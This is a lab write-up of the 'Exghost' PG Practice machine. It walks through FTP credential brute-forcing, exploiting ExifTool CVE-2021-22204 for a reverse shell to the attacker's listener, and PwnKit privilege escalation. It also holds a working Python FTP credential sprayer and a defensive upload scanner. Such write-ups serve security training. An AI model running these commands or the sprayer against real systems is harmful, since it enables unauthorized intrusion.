Exghost | PG Practice
Reconnaissance
Running an nmap scan, the following ports were found:
# Nmap 7.94SVN scan initiated Wed May 29 09:02:43 2024 as: nmap -p- -T4 -v --min-rate=1000 -sCV -oN nmap.txt 192.168.235.183
Nmap scan report for 192.168.235.183
Host is up (0.15s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: 403 Forbidden
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
Service Info: Host: 127.0.0.1; OS: Unix
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 29 09:05:07 2024 -- 1 IP address (1 host up) scanned in 144.47 seconds
Enumerating FTP, anonymous login is not permitted.
Navigating to the website, we get this 403 Forbidden page.
I was able to fuzz for an /uploads directory, but it also returns 403 Forbidden; all the usual 403 bypass attempts failed, so I treated this as a dead end.
However, I felt that brute-forcing FTP might be a quick win, so I used the tool below from GitHub, which gave me a valid username and password:
git clone https://github.com/rix4uni/FTPBruteForce.git
cd FTPBruteForce
go get -u github.com/jlaffaye/ftp
go run ftp-brute-force-default-credentails.go -ip 192.168.235.183:21
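As an added example (not part of the original post, and not the FTPBruteForce tool's code), here is the same idea in Python using the standard library's ftplib: a short, constructed list of default credentials is tried once each, a 530 reply counts as a wrong guess, and any network or protocol error stops the run so that a filtered port or an automatic ban is not mistaken for a failed login. The target, port and credential list are placeholders.

```python
"""Default-credential check against an FTP service.

Added example, not the post's or the FTPBruteForce tool's code. It tries a
short, constructed list of default pairs (the real tool ships a longer one)
and treats a 530 reply as "wrong password" but any network or protocol error
as a reason to stop, so a firewall drop or a fail2ban ban is not misread as
a failed guess.
"""
import ftplib

# Constructed list; extend with the target vendor's documented defaults.
DEFAULT_CREDS = [
    ("anonymous", "anonymous@"),  # cheap to check first, even where it is expected to fail
    ("ftp", "ftp"),
    ("admin", "admin"),
    ("admin", "password"),
    ("root", "root"),
    ("user", "user"),
    ("test", "test"),
]


def ftp_login(host, port, user, password, timeout=5.0):
    """Attempt a single login. True on success, False on a 530 rejection.

    Any other failure (connection refused, timeout, unexpected reply) is
    raised so the caller can tell 'bad password' from 'server unreachable'.
    """
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        ftp.login(user, password)
        return True
    except ftplib.error_perm as exc:
        if str(exc).startswith("530"):
            return False
        raise
    finally:
        try:
            ftp.quit()
        except Exception:  # never connected, or the server already hung up
            ftp.close()


def spray_defaults(host, port=21, creds=DEFAULT_CREDS, login=ftp_login):
    """Try each pair once, in order, stopping at the first that works.

    Returns (user, password) or None. `login` is injectable so the logic can
    be exercised without a live server; the default hits the network.
    """
    for user, password in creds:
        try:
            if login(host, port, user, password):
                return user, password
        except (OSError, EOFError, ftplib.Error) as exc:
            # Do not count a dead or rate-limiting server as "wrong password".
            raise RuntimeError(f"{host}:{port} stopped at {user!r}: {exc}") from exc
    return None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.235.183"
    hit = spray_defaults(target)
    print(f"{target}: " + (f"valid credentials {hit[0]}:{hit[1]}" if hit else "no default credentials worked"))
```

Run it as python3 ftp_defaults.py 192.168.235.183; the tool in the post does the same thing with a longer built-in list. Keep the list short and the pace slow against real targets: vsftpd's delay_failed_login and max_login_fails settings slow down and drop connections after failed logins, which is exactly the error this script refuses to swallow.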
Upon logging in, I found a backup file and downloaded it to my own machine.
The backup file is a packet capture. Opening it in Wireshark and filtering for HTTP, I found the ExifTool version in use.
The capture also showed file uploads to an endpoint called /exiftest.php. This turned out to be true when tested with curl: the command below uploads a local file as multipart form data (the kind of data normally submitted via a web form) using the -F option, with -v for verbose output. Note the parameter name myFile, which is the form field shown in the capture above:
curl -F "myFile=@./LOCALFILE" http://192.168.235.183/exiftest.php -v
Foothold
Using this blog, I created a malicious .jpeg file exploiting CVE-2021-22204: improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 through 12.23 allows arbitrary code execution when parsing a malicious image (fixed in 12.24). Reading the file's metadata is enough to trigger it, which is what /exiftest.php does with uploaded files.
python3 exploit.py -s 192.168.45.219 4444
Start a netcat listener first, then upload the image with curl to get a reverse shell:
nc -lvnp 4444
curl -F "myFile=@./image.jpg" http://192.168.180.183/exiftest.php -v
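As an added example (not part of the original post, and neither ExifTool's nor the exploit's code), here is a server-side check in Python that rejects an uploaded "image" if it carries a DjVu container, which is how the public PoC for this bug smuggles a DjVu annotation into a JPEG so that ExifTool runs its DjVu parser on a file the upload form accepted as a picture. All sample bytes are constructed; the hypothetical build_poc_jpeg only mimics the container layout for the test and does not produce a working exploit.

```python
"""Reject image uploads that smuggle a DjVu container.

Added example, not the post's code or ExifTool's. The public PoCs for the
ExifTool DjVu bug (CVE-2021-22204) do not upload a .djvu file; they wrap a
small DjVu document inside a JPEG's EXIF so the upload form sees an image
while ExifTool still runs its DjVu annotation parser on it. A JPEG never
legitimately carries a DjVu container, so an upload handler can reject one
before ExifTool ever sees it, whatever ExifTool version is installed.
All sample bytes below are constructed for the demo.
"""
import re
import struct

DJVU_MAGIC = b"AT&TFORM"
ANNOTATION_CHUNKS = {b"ANTa", b"ANTz"}  # raw and BZZ-compressed annotations
# Perl constructs that never belong in a (metadata ...) annotation; the
# backslash-newline is the shape used by the public PoC payload.
SUSPICIOUS = re.compile(rb"qx\{|`|system\(|\\\n")


def iter_chunks(data, offset, end):
    """Walk IFF chunks in data[offset:end], descending into FORM containers."""
    while offset + 8 <= end:
        cid = data[offset:offset + 4]
        (length,) = struct.unpack(">I", data[offset + 4:offset + 8])
        start, stop = offset + 8, min(offset + 8 + length, end)
        if cid == b"FORM":
            yield from iter_chunks(data, start + 4, stop)  # skip DJVU/DJVM form type
        else:
            yield cid, data[start:stop]
        offset = stop + (length & 1)  # chunks are padded to an even length


def find_embedded_djvu(blob):
    """Return one finding per DjVu container found at any offset in blob."""
    findings = []
    for m in re.finditer(re.escape(DJVU_MAGIC), blob):
        base = m.start()
        if base + 12 > len(blob):
            break
        (form_len,) = struct.unpack(">I", blob[base + 8:base + 12])
        end = min(base + 12 + form_len, len(blob))
        annotations = []
        for cid, payload in iter_chunks(blob, base + 4, end):
            if cid in ANNOTATION_CHUNKS:
                annotations.append({
                    "chunk": cid.decode(),
                    # ANTz needs BZZ decompression to inspect; treat it as unreviewable
                    "suspicious": cid == b"ANTz" or bool(SUSPICIOUS.search(payload)),
                })
        findings.append({"offset": base, "annotations": annotations})
    return findings


def scan_upload(blob):
    """Decide whether an uploaded 'JPEG' may be handed to ExifTool."""
    if not blob.startswith(b"\xff\xd8\xff"):
        return {"verdict": "reject", "reason": "not a JPEG", "findings": []}
    findings = find_embedded_djvu(blob)
    if findings:
        return {"verdict": "reject", "reason": "embedded DjVu container", "findings": findings}
    return {"verdict": "accept", "reason": "", "findings": []}


def _chunk(cid, payload):
    return cid + struct.pack(">I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")


def build_poc_jpeg(annotation):
    """Constructed stand-in for the PoC output: a JPEG whose APP1 segment holds a DjVu.

    Hypothetical helper for the demo only; it does not reproduce the EXIF
    wrapping the real PoC uses and will not trigger the bug.
    """
    info = struct.pack(">HHBBHBB", 1, 1, 24, 0, 100, 22, 0)  # 1x1 px INFO chunk
    body = b"DJVU" + _chunk(b"INFO", info) + _chunk(b"ANTa", annotation)
    djvu = b"AT&T" + b"FORM" + struct.pack(">I", len(body)) + body
    app1 = b"\xff\xe1" + struct.pack(">H", len(djvu) + 2) + djvu
    return b"\xff\xd8" + app1 + b"\xff\xd9"


# Constructed samples: a minimal JFIF file and a JPEG carrying a PoC-shaped annotation.
BENIGN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"
POC_ANNOTATION = b'(metadata (Copyright "\\\n" . qx{id} . \\\n" b "))'
POC_JPEG = build_poc_jpeg(POC_ANNOTATION)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_JPEG), ("poc", POC_JPEG)):
        print(name, scan_upload(blob))
```

The check is deliberately coarse: any DjVu container inside something claiming to be a JPEG is rejected, and a compressed ANTz annotation is flagged without being decoded. It complements, rather than replaces, updating ExifTool to 12.24 or later.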
Privilege Escalation
Running linpeas.sh on the machine, I discovered a few exploitable SUID binaries. This was a real pain, as I had to go over each of them to see which was the quick win 🤦‍♀️
Well, privilege escalation was done via the pkexec exploit popularly known as CVE-2021-4034 (PwnKit).
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It can also be used to execute commands with elevated privileges: pkexec followed by a command runs that command as root, subject to the configured policy. CVE-2021-4034 is a memory-corruption bug in how the SUID pkexec handles an empty argument list; any local user can exploit it to get a root shell regardless of policy, it was present in every polkit release since 2009, and distributions patched it in January 2022.
You can get the Python exploit from here, since most of the C exploits don't work.
Mitigations
- Change the default credentials of the FTP server to a strong, unique username and password.
- Replace FTP with a more secure protocol such as SFTP (SSH File Transfer Protocol) or FTPS (FTP Secure).
- Update ExifTool to a version that includes the security patch (12.24 or later); better still, remove ExifTool or restrict its use on untrusted uploads.
- Update the Polkit package or, as a stop-gap, remove the SUID bit from pkexec with sudo chmod 0755 /usr/bin/pkexec (this also stops legitimate pkexec use until the package is updated).
Have fun xD
Status Check ⚠️
I shouldn't be playing boxes 🤣, I have exams next week, but hell yeah, I really don't want to be far away from doing this. However, I might limit all of this in the coming months. Take care of yourselves, fellas :)